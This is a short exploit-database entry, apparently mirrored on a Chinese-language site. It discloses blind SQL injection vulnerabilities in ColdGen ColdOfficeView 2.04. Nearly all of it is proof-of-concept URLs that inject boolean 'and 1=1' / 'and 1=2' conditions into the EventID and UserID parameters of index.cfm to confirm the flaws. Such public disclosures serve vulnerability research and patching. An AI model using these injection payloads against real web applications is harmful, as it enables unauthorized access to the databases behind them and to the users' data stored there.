ColdOfficeView 2.04 – Multiple Blind SQL Injections

Exploit Database
101 阅读

作者： mr_me

日期： 2010-09-07
类别：
- webapps
平台：
- windows
来源：https://www.exploit-db.com/exploits/14934/

1

2

3

4

5

6

7

8

9

10

11

12

13

# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities

# Vendor: http://www.coldgen.com/

# Found by: mr_me (net-ninja.net)

PoC's

1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]

http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true

http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false

2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]

http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true

http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false